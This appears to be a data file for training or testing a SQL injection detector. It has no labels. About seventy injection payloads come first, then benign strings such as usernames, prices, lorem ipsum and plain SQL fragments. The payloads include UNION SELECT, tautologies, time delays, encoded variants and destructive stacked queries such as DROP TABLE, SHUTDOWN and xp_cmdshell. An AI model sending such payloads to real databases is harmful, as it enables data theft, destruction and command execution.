' UNION SELECT 1,2;#  
' OR SLEEP(5) /*x*/  
'; DROP TABLE logs;  
' AND 1=CONVERT(int  
'/**/OR 1=1 /*x*/  
' UNION ALL SELECT#  
'; EXEC('cmd.exe')  
' OR '1'='1' /*x*/  
'; INSERT INTO x#  
'||pg_sleep(5);  
' AND 1=2 /*test*/  
'%55NION SELECT 1#  
' OR 'a'='a' --  
' UNION SELECT @@#  
'; DELETE FROM x#  
' CHR(97)||'adm  
'||(SELECT 0x41)  
' OR 1=1; DROP#  
'; UPDATE users#  
' CONVERT(int,1  
' OR IF(1=1,1)#  
'/**/AND 1=1#x  
' UNION SELECT#x  
'; EXEC('ls -l')  
' OR 'admin'=1#  
' AND 1=1 -- x  
' OR 2+2=4 --x  
'%20UNION%20SEL  
'; TRUNCATE log  
' OR 'x'='x' --  
'/**/SLEEP(5)#  
'; GRANT ALL TO  
' OR 1=1; EXEC  
' UNION USER();  
' AND 1=1; --  
'; CREATE TABLE  
' OR 'true'=1#  
'||(SELECT 1)#  
' OR HEX(1)=1  
'; ALTER USER#  
' OR ASCII(1)=  
'/**/DROP TABLE  
'; REVOKE ALL  
' OR BIN(1)=1  
' UNION LOAD_FILE  
'; SHUTDOWN;  
' OR CHAR(1)=  
'/**/EXEC('x')  
' OR 1=1; DEL  
' UNION EXEC x  
'; xp_cmdshell  
' OR MD5(1)=  
'/**/WAITFOR 0  
'; DECLARE @x  
' OR '1'='1'  
'; BACKUP DB  
' OR VERSION  
'/**/INSERT x  
'; DUMP DATA  
' OR 'root'=  
' UNION CMD#  
'; RANDOMIZE  
' OR 1=1; UP  
'/**/DELETE#  
' OR 1=1; SE
' OR 2=2; UP
' OR 2=2; SE
' OR 3=3; UP
' OR 4=4; SE
' OR 5=5; UP  
User123
uSeR678
user890  
SELECT * FROM products  
price: $19.99  
apple, banana  
Hello, how are you?  
Good morning...  
Testing: @example.com  
123-456-7890  
user@domain.com  
Lorem ipsum dolor  
Sed viverra quam  
Curabitur auctor  
Donec tincidunt  
Order ID: 12345  
User email: test  
INSERT INTO logs  
UPDATE orders SET  
Terms & Conditions  
Hello, please login  
SELECT product_name  
Password1234  
Order placed!  
#Hashtag  
User.name+123  
Price: $99.99  
UPDATE products  
DELETE FROM users  
INSERT INTO users  